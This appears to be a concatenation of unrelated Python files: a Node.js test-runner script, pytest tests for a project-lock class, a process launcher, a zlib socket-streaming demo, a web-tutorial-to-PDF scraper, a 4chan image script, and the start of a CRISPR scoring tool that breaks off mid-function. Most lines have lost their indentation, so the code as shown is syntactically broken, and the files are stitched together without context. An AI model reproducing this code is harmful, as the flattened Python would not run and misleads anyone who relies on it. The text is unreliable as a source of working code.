self.defs = defs
def ClassifyTests(self, cases, env):
sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = [ ]
all_outcomes = set([])
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes = set([])
for rule in matches:
outcomes = outcomes.union(rule.GetOutcomes(env, self.defs))
unused_rules.discard(rule)
if not outcomes:
outcomes = [PASS]
case.outcomes = outcomes
all_outcomes = all_outcomes.union(outcomes)
result.append(ClassifiedTest(case, outcomes))
return (result, list(unused_rules), all_outcomes)
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
set = self.value.GetOutcomes(env, defs)
assert isinstance(set, ListSet)
return set.elms
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in xrange(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
raise Exception("Malformed line: '%s'." % line)
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option('--logfile', dest='logfile',
      help='write test output to file. NOTE: this only applies to the tap progress indicator')
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono, tap)",
choices=PROGRESS_INDICATORS.keys(), default="mono")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=120, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--special-command", default=None)
result.add_option("--node-args", dest="node_args", help="Args to pass through to Node",
default=[], action="append")
result.add_option("--expect-fail", dest="expect_fail",
help="Expect test cases to fail", default=False, action="store_true")
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--check-deopts", help="Check tests for permanent deoptimizations",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--flaky-tests",
help="Regard tests marked as flaky (run|skip|dontcare)",
default="run")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("-J", help="Run tasks in parallel on all cores",
default=False, action="store_true")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--shell", help="Path to V8 shell", default="shell")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
result.add_option("-r", "--run",
help="Divide the tests in m groups (interleaved) and run tests from group n (--run=n,m with n < m)",
default="")
result.add_option('--temp-dir',
help='Optional path to change directory used for tests', default=False)
result.add_option('--repeat',
help='Number of times to repeat given tests',
default=1, type="int")
result.add_option('--abort-on-timeout',
help='Send SIGABRT instead of SIGTERM to kill processes that time out',
default=False, action="store_true", dest="abort_on_timeout")
result.add_option("--type",
help="Type of build (simple, fips)",
default=None)
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
options.arch = options.arch.split(',')
options.mode = options.mode.split(',')
options.run = options.run.split(',')
if options.run == [""]:
options.run = None
elif len(options.run) != 2:
print "The run argument must be two comma-separated integers."
return False
else:
try:
options.run = map(int, options.run)
except ValueError:
print "Could not parse the integers from the run argument."
return False
if options.run[0] < 0 or options.run[1] < 0:
print "The run argument cannot have negative integers."
return False
if options.run[0] >= options.run[1]:
print "The test group to run (n) must be smaller than number of groups (m)."
return False
if options.J:
# inherit JOBS from environment if provided. some virtualised systems
    # tend to exaggerate the number of available cpus/cores.
cores = os.environ.get('JOBS')
options.j = int(cores) if cores is not None else multiprocessing.cpu_count()
if options.flaky_tests not in ["run", "skip", "dontcare"]:
print "Unknown flaky-tests mode %s" % options.flaky_tests
return False
return True
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
def PrintReport(cases):
def IsFailOk(o):
return (len(o) == 2) and (FAIL in o) and (OKAY in o)
unskipped = [c for c in cases if not SKIP in c.outcomes]
print REPORT_TEMPLATE % {
'total': len(cases),
'skipped': len(cases) - len(unskipped),
'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
}
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(s):
stripped = [ c.strip() for c in s.split('/') ]
return [ Pattern(s) for s in stripped if len(s) > 0 ]
def NormalizePath(path, prefix='test/'):
# strip the extra path information of the specified test
prefix = prefix.replace('\\', '/')
path = path.replace('\\', '/')
if path.startswith(prefix):
path = path[len(prefix):]
if path.endswith('.js'):
path = path[:-3]
elif path.endswith('.mjs'):
path = path[:-4]
return path
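# Illustrative helper (not called anywhere): the 'test/' prefix and the
# .js/.mjs extension are stripped, after normalising Windows separators.
def _normalize_path_examples():
  assert NormalizePath('test/parallel/test-assert.js') == 'parallel/test-assert'
  assert NormalizePath('test\\es-module\\test-esm.mjs') == 'es-module/test-esm'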
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
pos = value.find('@')
import urllib
prefix = urllib.unquote(value[:pos]).split()
suffix = urllib.unquote(value[pos+1:]).split()
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def PrintCrashed(code):
if utils.IsWindows():
return "CRASHED"
else:
return "CRASHED (Signal: %d)" % -code
# these suites represent special cases that should not be run as part of the
# default JavaScript test-run, e.g., internet/ requires a network connection,
# addons/ requires compilation.
IGNORED_SUITES = [
'addons',
'addons-napi',
'doctool',
'gc',
'internet',
'pummel',
'test-known-issues',
'tick-processor',
'timers'
]
def ArgsToTestPaths(test_root, args, suites):
if len(args) == 0 or 'default' in args:
def_suites = filter(lambda s: s not in IGNORED_SUITES, suites)
args = filter(lambda a: a != 'default', args) + def_suites
subsystem_regex = re.compile(r'^[a-zA-Z-]*$')
check = lambda arg: subsystem_regex.match(arg) and (arg not in suites)
mapped_args = ["*/test*-%s-*" % arg if check(arg) else arg for arg in args]
paths = [SplitPath(NormalizePath(a)) for a in mapped_args]
return paths
def get_env_type(vm, options_type, context):
if options_type is not None:
env_type = options_type
else:
# 'simple' is the default value for 'env_type'.
env_type = 'simple'
ssl_ver = Execute([vm, '-p', 'process.versions.openssl'], context).stdout
if 'fips' in ssl_ver:
env_type = 'fips'
return env_type
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
ch = logging.StreamHandler(sys.stdout)
logger.addHandler(ch)
logger.setLevel(logging.INFO)
if options.logfile:
fh = logging.FileHandler(options.logfile, mode='wb')
logger.addHandler(fh)
workspace = abspath(join(dirname(sys.argv[0]), '..'))
test_root = join(workspace, 'test')
suites = GetSuites(test_root)
repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories)
paths = ArgsToTestPaths(test_root, args, suites)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
if options.check_deopts:
options.node_args.append("--trace-opt")
options.node_args.append("--trace-file-names")
# --always-opt is needed because many tests do not run long enough for the
# optimizer to kick in, so this flag will force it to run.
options.node_args.append("--always-opt")
options.progress = "deopts"
shell = abspath(options.shell)
buildspace = dirname(shell)
processor = GetSpecialCommandProcessor(options.special_command)
context = Context(workspace,
buildspace,
VERBOSE,
shell,
options.node_args,
options.expect_fail,
options.timeout,
processor,
options.suppress_dialogs,
options.store_unexpected_output,
options.repeat,
options.abort_on_timeout)
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for arch in options.arch:
for mode in options.mode:
vm = context.GetVm(arch, mode)
if not exists(vm):
print "Can't find shell executable: '%s'" % vm
continue
archEngineContext = Execute([vm, "-p", "process.arch"], context)
vmArch = archEngineContext.stdout.rstrip()
        if archEngineContext.exit_code != 0 or vmArch == "undefined":
print "Can't determine the arch of: '%s'" % vm
print archEngineContext.stderr.rstrip()
continue
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': vmArch,
'type': get_env_type(vm, options.type, context),
}
test_list = root.ListTests([], path, context, arch, mode)
unclassified_tests += test_list
(cases, unused_rules, _) = (
config.ClassifyTests(test_list, env))
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = (
globally_unused_rules.intersection(unused_rules))
all_cases += cases
all_unused.append(unused_rules)
# We want to skip the inspector tests if node was built without the inspector.
has_inspector = Execute([vm,
"-p", "process.config.variables.v8_enable_inspector"], context)
if has_inspector.stdout.rstrip() == "0":
context.v8_enable_inspector = False
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print "--- begin source: %s ---" % test.GetLabel()
source = test.GetSource().strip()
print source
print "--- end source: %s ---" % test.GetLabel()
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path])
tempdir = os.environ.get('NODE_TEST_DIR') or options.temp_dir
if tempdir:
os.environ['NODE_TEST_DIR'] = tempdir
try:
os.makedirs(tempdir)
except OSError as exception:
if exception.errno != errno.EEXIST:
print "Could not create the temporary directory", options.temp_dir
sys.exit(1)
if options.report:
PrintReport(all_cases)
result = None
def DoSkip(case):
if SKIP in case.outcomes or SLOW in case.outcomes:
return True
return FLAKY in case.outcomes and options.flaky_tests == SKIP
cases_to_run = [ c for c in all_cases if not DoSkip(c) ]
if options.run is not None:
    # The list of tests must be sorted before selecting a subset, to avoid
    # silent errors if this file ever lists the tests in an order that
    # differs from machine to machine.
cases_to_run.sort(key=lambda c: (c.case.arch, c.case.mode, c.case.file))
cases_to_run = [ cases_to_run[i] for i
in xrange(options.run[0],
len(cases_to_run),
options.run[1]) ]
if len(cases_to_run) == 0:
print "No tests to run."
return 1
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j, options.flaky_tests):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print "Interrupted"
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ]
timed_tests.sort(lambda a, b: a.CompareTime(b))
index = 1
for entry in timed_tests[:20]:
t = FormatTime(entry.duration.total_seconds())
sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel()))
index += 1
return result
if __name__ == '__main__':
sys.exit(Main())
|
test_user.py
|
"""User handler tests."""
import os
import threading
import time
import pytest
from docknv.tests.utils import using_temporary_directory
from docknv.user import UserSession, ProjectLocked, user_get_username
def test_real_ids():
"""Real IDs."""
os.environ.pop("DOCKNV_TEST_ID")
os.environ.pop("DOCKNV_TEST_USERNAME")
assert user_get_username() != "test"
os.environ["DOCKNV_TEST_ID"] = "1"
os.environ["DOCKNV_TEST_USERNAME"] = "1"
def test_session_paths():
"""Session paths."""
with using_temporary_directory() as tempdir:
project_path = tempdir
os.environ["DOCKNV_USER_PATH"] = project_path
session = UserSession.load_from_path(user_get_username(), project_path)
paths = session.get_paths()
assert paths.get_project_root() == os.path.join(
project_path, ".docknv"
)
assert paths.get_user_root() == os.path.join(
project_path, ".docknv", "test"
)
assert paths.get_user_configuration_root("toto") == os.path.join(
project_path, ".docknv", "test", "toto"
)
assert paths.get_file_path("tutu") == os.path.join(
project_path, ".docknv", "test", "tutu"
)
assert paths.get_file_path("tutu", "toto") == os.path.join(
project_path, ".docknv", "test", "toto", "tutu"
)
def test_session_config():
"""Session config."""
with using_temporary_directory() as tempdir:
project_path = tempdir
os.environ["DOCKNV_USER_PATH"] = project_path
session = UserSession.load_from_path(user_get_username(), project_path)
# No configuration set
assert session.get_current_configuration() is None
# Setting one configuration
session.set_current_configuration("pouet")
assert session.get_current_configuration() == "pouet"
# Unset
session.unset_current_configuration()
assert session.get_current_configuration() is None
def test_session_existing():
"""Session tests."""
with using_temporary_directory() as tempdir:
project_path = tempdir
os.environ["DOCKNV_USER_PATH"] = project_path
session_file = os.path.join(
project_path, ".docknv", "test", "docknv.yml"
)
os.makedirs(os.path.dirname(session_file))
with open(session_file, mode="w") as handle:
handle.write("current:")
session = UserSession.load_from_path(user_get_username(), project_path)
assert "current" in session.session_data
assert session.session_data["current"] is None
# Save
session.save()
# Remove
session.remove_path(force=True)
session.remove_path(force=True)
session.remove_path("toto", force=True)
def test_session_lock():
"""Session lock."""
with using_temporary_directory() as tempdir:
project_path = tempdir
os.environ["DOCKNV_USER_PATH"] = project_path
session = UserSession.load_from_path(user_get_username(), project_path)
lock = session.get_lock()
assert lock.get_file() == f"{project_path}/.test.lock"
# Lock should be disabled
assert not lock.is_enabled
# Unlocking should work
assert lock.unlock()
# Locking should work
assert lock.lock()
# Lock should be enabled
assert lock.is_enabled
# Lockfile should contain a $
with open(lock.get_file(), mode="r") as handle:
assert handle.read() == "$"
# Relocking should return False
assert not lock.lock()
# But unlocking should work
assert lock.unlock()
# And is should be disabled
assert not lock.is_enabled
# And the file should not exist
with pytest.raises(IOError):
with open(lock.get_file(), mode="r") as handle:
pass
# Try-lock test
with lock.try_lock():
# Lock should be enabled
assert lock.is_enabled
# Now, lock should be disabled
assert not lock.is_enabled
# Second try-lock test
assert lock.lock()
with pytest.raises(ProjectLocked):
with lock.try_lock():
pass
assert lock.is_enabled
# Third try-lock test
assert lock.unlock()
with pytest.raises(RuntimeError):
with lock.try_lock():
assert lock.is_enabled
# Raise exception
raise RuntimeError("oops")
# Should be unlocked
assert not lock.is_enabled
# Try-lock w/ timeout test
lock.lock()
with pytest.raises(ProjectLocked):
with lock.try_lock(timeout=2):
pass
# Try-lock w/ timeout, waiting for unlock
def unlock_thread():
time.sleep(2)
lock.unlock()
thr1 = threading.Thread(target=unlock_thread)
thr1.start()
assert lock.is_enabled
with lock.try_lock(timeout=2):
pass
thr1.join()
assert not lock.is_enabled
# Try-lock /w infinite timeout, waiting for unlock
def unlock_thread2():
time.sleep(3)
lock.unlock()
lock.lock()
thr1 = threading.Thread(target=unlock_thread2)
thr1.start()
with lock.try_lock(timeout=-1):
pass
thr1.join()
assert not lock.is_enabled
|
start-VNF-LISTENER_1_from_2.py
|
#---- Python VM startup for LISTENER_1_from_2 ---
import multiprocessing
import time
import LISTENER_1_from_2
import DECRYPT_1_from_2
import ENCRYPT_2_to_1
import WRITER_2_to_1
processes = []
if __name__ == '__main__':
p = multiprocessing.Process(target=LISTENER_1_from_2.startLISTENER_1_from_2)
processes.append(p)
p.start()
print "started LISTENER_1_from_2"
time.sleep(5)
p = multiprocessing.Process(target=DECRYPT_1_from_2.startDECRYPT_1_from_2)
processes.append(p)
p.start()
print "started DECRYPT_1_from_2"
time.sleep(5)
p = multiprocessing.Process(target=ENCRYPT_2_to_1.startENCRYPT_2_to_1)
processes.append(p)
p.start()
print "started ENCRYPT_2_to_1"
time.sleep(5)
p = multiprocessing.Process(target=WRITER_2_to_1.startWRITER_2_to_1)
processes.append(p)
p.start()
print "started WRITER_2_to_1"
time.sleep(5)
for p in processes:
p.join()
|
zlib_server.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""
"""
#__version__ = "$Id$"
#end_pymotw_header
import zlib
import logging
import SocketServer
import binascii
BLOCK_SIZE = 64
class ZlibRequestHandler(SocketServer.BaseRequestHandler):
logger = logging.getLogger('Server')
def handle(self):
compressor = zlib.compressobj(1)
# Find out what file the client wants
filename = self.request.recv(1024)
self.logger.debug('client asked for: "%s"', filename)
# Send chunks of the file as they are compressed
with open(filename, 'rb') as input:
while True:
block = input.read(BLOCK_SIZE)
if not block:
break
self.logger.debug('RAW "%s"', block)
compressed = compressor.compress(block)
                if compressed:  # enough data accumulated to emit a compressed block
self.logger.debug('SENDING "%s"',
binascii.hexlify(compressed))
self.request.send(compressed)
else:
self.logger.debug('BUFFERING')
# Send any data being buffered by the compressor
remaining = compressor.flush()
while remaining:
to_send = remaining[:BLOCK_SIZE]
remaining = remaining[BLOCK_SIZE:]
self.logger.debug('FLUSHING "%s"',
binascii.hexlify(to_send))
self.request.send(to_send)
return
if __name__ == '__main__':
import socket
import threading
from cStringIO import StringIO
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
logger = logging.getLogger('Client')
# Set up a server, running in a separate thread
address = ('localhost', 0) # let the kernel assign a port ?
server = SocketServer.TCPServer(address, ZlibRequestHandler)
ip, port = server.server_address # what port was assigned?
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True)
t.start()
# Connect to the server as a client
logger.info('Contacting server on %s:%s', ip, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# Ask for a file
requested_file = 'lorem.txt'
logger.debug('sending filename: "%s"', requested_file)
len_sent = s.send(requested_file)
# Receive a response
buffer = StringIO()
decompressor = zlib.decompressobj()
while True:
response = s.recv(BLOCK_SIZE)
if not response:
break
logger.debug('READ "%s"', binascii.hexlify(response))
# Include any unconsumed data when feeding the decompressor.
        # This is the key step; a standalone sketch of the same pattern is at the end of this file.
to_decompress = decompressor.unconsumed_tail + response
while to_decompress:
decompressed = decompressor.decompress(to_decompress)
if decompressed:
logger.debug('DECOMPRESSED "%s"', decompressed)
buffer.write(decompressed)
# Look for unconsumed data due to buffer overflow
                # remaining data awaiting decompression
                to_decompress = decompressor.unconsumed_tail
            # not enough input yet to produce a decompressed block
else:
logger.debug('BUFFERING')
to_decompress = None
    # deal with data remaining inside the decompressor buffer
remainder = decompressor.flush()
if remainder:
logger.debug('FLUSHED "%s"', remainder)
        buffer.write(remainder)
full_response = buffer.getvalue()
lorem = open('lorem.txt', 'rt').read()
logger.debug('response matches file contents: %s',
full_response == lorem)
# Clean up
s.close()
server.socket.close()
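# Standalone sketch (illustrative, not exercised by the server above) of the
# same streaming pattern the client loop uses: feed each received chunk to the
# decompressor together with any leftover unconsumed_tail, then flush.
def _streaming_decompress_demo():
    data = b'lorem ipsum ' * 1000
    compressed = zlib.compress(data)
    decompressor = zlib.decompressobj()
    result = b''
    for i in range(0, len(compressed), BLOCK_SIZE):
        chunk = compressed[i:i + BLOCK_SIZE]
        # Prepend whatever input zlib could not consume on the previous call
        result += decompressor.decompress(decompressor.unconsumed_tail + chunk)
    result += decompressor.flush()
    assert result == data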
|
main.py
|
from urllib import request
from bs4 import BeautifulSoup
from multiprocessing import Process
from collections import deque
import json
import os
import sys
import pdfkit
import subprocess
import platform
import re
import time
def getPDF(filename = 'out'):
def _get_pdfkit_config():
"""wkhtmltopdf lives and functions differently depending on Windows or Linux. We
need to support both since we develop on windows but deploy on Heroku.
Returns: A pdfkit configuration"""
if platform.system() == 'Windows':
return pdfkit.configuration(wkhtmltopdf=os.environ.get('WKHTMLTOPDF_BINARY', 'C:\\Program Files\\wkhtmltopdf\\bin\\wkhtmltopdf.exe'))
else:
WKHTMLTOPDF_CMD = subprocess.Popen(['which', os.environ.get('WKHTMLTOPDF_BINARY', 'wkhtmltopdf')], stdout=subprocess.PIPE).communicate()[0].strip()
return pdfkit.configuration(wkhtmltopdf=WKHTMLTOPDF_CMD)
try:
if 'DYNO' in os.environ:
print ('loading wkhtmltopdf path on heroku')
WKHTMLTOPDF_CMD = subprocess.Popen(
                ['which', os.environ.get('WKHTMLTOPDF_BINARY', 'wkhtmltopdf-pack')], # Note we default to 'wkhtmltopdf-pack' as the binary name
stdout=subprocess.PIPE).communicate()[0].strip()
print("DYNO")
pdfkit.from_file(filename + '.html', filename + '.pdf', configuration=_get_pdfkit_config())
else:
print ('loading wkhtmltopdf path on localhost')
MYDIR = os.path.dirname(__file__)
WKHTMLTOPDF_CMD = os.path.join(MYDIR + "/static/executables/bin/", "wkhtmltopdf.exe")
pdfkit.from_file(filename + '.html', filename + '.pdf', configuration=_get_pdfkit_config())
except Exception as e:
print("Empty File Possible" + str(e))
class TPExtractor:
def __init__(self, argsList):
self.start = '<!-- Tutorial Content Starts Here -->'
self.end = '<!-- Tutorial Content Ends Here -->'
self.domain = 'https://www.tutorialspoint.com'
self.url = str(argsList[1])
self.iters = int(argsList[2]) if len(argsList) > 2 else 1
self.outFile = str(argsList[3]) if len(argsList) > 3 else 'out'
outFile = self.outFile
for i in ['.html', '.pdf']:
if os.path.exists(outFile + i):
os.remove(outFile + i)
for file in os.scandir('.'):
if file.name.endswith(".html") or file.name.endswith(".pdf"):
os.unlink(file.path)
def getNext(self, content):
try:
soup = BeautifulSoup(content, 'html.parser')
outerdiv = soup.find_all("div", attrs = {"id":"bottom_navigation"})
innerdiv = [iter.find('div', attrs = {"class" : "nxt-btn"} ) for iter in outerdiv]
nextURL = [iter.find('a')["href"] for iter in innerdiv]
return nextURL[-1]
except Exception as E:
print(E)
return False
def absoluteLinks(self, content, domain):
soup = BeautifulSoup(content, 'html.parser')
for hyperlink in soup.find_all(href=True):
try:
request.urlopen(hyperlink["href"])
except :
hyperlink["href"] = domain + hyperlink["href"]
for hyperlink in soup.find_all(src=True):
try:
request.urlopen(hyperlink["src"])
except :
hyperlink["src"] = domain + hyperlink["src"]
return str(soup)
def addToHTML(self, URL, iterations = 1, filename = 'out'):
print(str(iterations) + " pages to go . . .")
if iterations < 1:
return getPDF(filename)
req = request.urlopen(URL)
html = req.read().decode('utf-8')
content = html.split(self.start)[1].split(self.end)[0]
content = self.absoluteLinks(content, self.domain)
htmlFilename = filename + '.html'
if os.path.exists(htmlFilename):
fileOption = 'a'
else:
fileOption = 'w'
f = open(htmlFilename, fileOption)
f.write(content + '<hr><hr>')
f.close()
nextURL = self.getNext(content)
if not nextURL:
self.addToHTML(URL, iterations = 0, filename = filename)
else:
self.addToHTML(nextURL, iterations = iterations - 1, filename = filename)
def main(self):
self.addToHTML(self.url, self.iters, self.outFile)
class Generic:
def __init__(self, argsList):
self.url = str(argsList[1])
self.iters = int(argsList[2]) if len(argsList) > 2 else 1
self.outFile = str(argsList[3]) if len(argsList) > 3 else 'out'
outFile = self.outFile
self.ob = TPExtractor(argsList)
self.domain = str(self.url.split("//")[-1].split("/")[0].split('?')[0])
print(self.domain)
self.regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4
r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
self.nextRe = re.compile(r'.*(next|nxt).*', re.IGNORECASE)
def getNext(self, content):
try:
soup = BeautifulSoup(content, 'html.parser')
# parsed = soup.prettify()
# parsed = parsed.split('\n')
# print(parsed)
# for line in parsed:
# if 'href' in line:
# # print(line)
# continue
ret = deque([])
retP = deque([])
for l in soup.find_all(href=True):
if self.nextRe.match(str(l)) and ( 'class' in str(l) or 'id' in str(l)):
ret.appendleft(str(l["href"]))
elif self.nextRe.match(str(l.parent)) and ( 'class' in str(l.parent) or 'id' in str(l.parent)):
retP.appendleft(str(l["href"]))
if ret:
return ret[0]
            if retP:
                return retP[0]
print(ret, retP)
return False
except Exception as E:
print(E)
return False
def getAbsolute(self, content, domain):
soup = BeautifulSoup(content, 'html.parser')
for hyperlink in soup.find_all(href=True):
if str(hyperlink["href"]).startswith('/'):
hyperlink["href"] = str(domain) + hyperlink["href"]
elif str(hyperlink["href"]).startswith('./'):
hyperlink["href"] = str(domain) + hyperlink["href"][1:]
elif not self.regex.match(hyperlink["href"]):
hyperlink["href"] = 'http://' + str(domain) + '/' + hyperlink["href"]
for hyperlink in soup.find_all(src=True):
if str(hyperlink["src"]).startswith('/'):
hyperlink["src"] = str(domain) + hyperlink["src"]
elif str(hyperlink["src"]).startswith('./'):
hyperlink["src"] = str(domain) + hyperlink["src"][1:]
elif not self.regex.match(hyperlink["src"]):
hyperlink["src"] = 'http://' + str(domain) + '/' + hyperlink["src"]
return str(soup)
def util(self, URL, iterations = 1, filename = 'out'):
print(str(iterations) + " pages to go . . .")
if iterations < 1:
action_process = Process(target=lambda : getPDF(filename))
action_process.start()
action_process.join(timeout=15)
action_process.terminate()
return None
req = request.urlopen(URL)
html = req.read().decode('utf-8')
domain = self.domain
content = str(self.getAbsolute(html, domain))
htmlFilename = filename + '.html'
if os.path.exists(htmlFilename):
fileOption = 'a'
else:
fileOption = 'w'
f = open(htmlFilename, fileOption)
f.write(content + '<hr><hr>')
f.close()
print('.')
nextURL = self.getNext(content)
print(nextURL)
if not nextURL:
self.util(URL, iterations = 0, filename = filename)
else:
self.util(nextURL, iterations = iterations - 1, filename = filename)
def main(self):
self.util(self.url, self.iters, self.outFile)
# TEST
if __name__ == '__main__':
argsList = sys.argv
# TPExtractor(argsList).main()
# Generic(argsList).main()
# getPDF('out')
|
4chanlurker.py
|
#!/usr/bin/python3
# Released under apache license 2.0, no warranties
# included in this software and it's not meant for
# any production purpose. I decline any responsibility
# copyright 2016 Raffaele Di Campli
from postsifter import PostSifter, Post
import logging
import sys
import subprocess
import time
import threading
import json
if __name__ == "__main__":
logger = logging.getLogger()
logger.setLevel(logging.INFO)
config = []
with open("conf.json") as configFile:
config = json.load(configFile)
config["boards"] = config["boards"].split(" ")
config["command"] = config["command"].split(" ")
logging.debug("main: {}".format(config))
sifter = PostSifter(config)
post = sifter.get_random_post()
logging.debug("main: {}".format(config["command"]))
p = subprocess.Popen(config["command"], stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
#must use multithreading because subprocess.communicate() is blocking
thr = threading.Thread(target=p.communicate, args=(post.image,))
thr.start()
logging.debug("main: i'm going to sleep")
time.sleep(config["delay"])
p.terminate()
thr.join()
|
cfd-score-calculator.py
|
#Calculates the Cutting Frequency Determination score
#Requirements: 1. Pickle file with mismatch scores in working directory
# 2. Pickle file containing PAM scores in working directory
#Input: 1. 23mer WT sgRNA sequence
# 2. 23mer Off-target sgRNA sequence
#Output: CFD score
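#The argument parser below accepts the two sequences, e.g. (hypothetical 23mers):
#  --wt AGTCTGAGTCGGAGCCAGGGCGG --off AGTCTGAGTCGGAGCCAGGGAGG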
import pickle
import argparse
import re
import numpy as np
import os
from multiprocessing import Process, Manager
NUM_CORES = 16
# Did small experiment on Jan 11
# PAM does not matter - good!
# so we'll just use a TGG
APP_STATIC = "/home/joshm/GUIDES/CRISPR-Library-Designer/static"
exome_path_hum = os.path.join(APP_STATIC, 'data', 'exome_hum_ccds.txt')
mer_len = 20
def get_parser():
parser = argparse.ArgumentParser(description='Calculates CFD score')
parser.add_argument('--wt',
type=str,
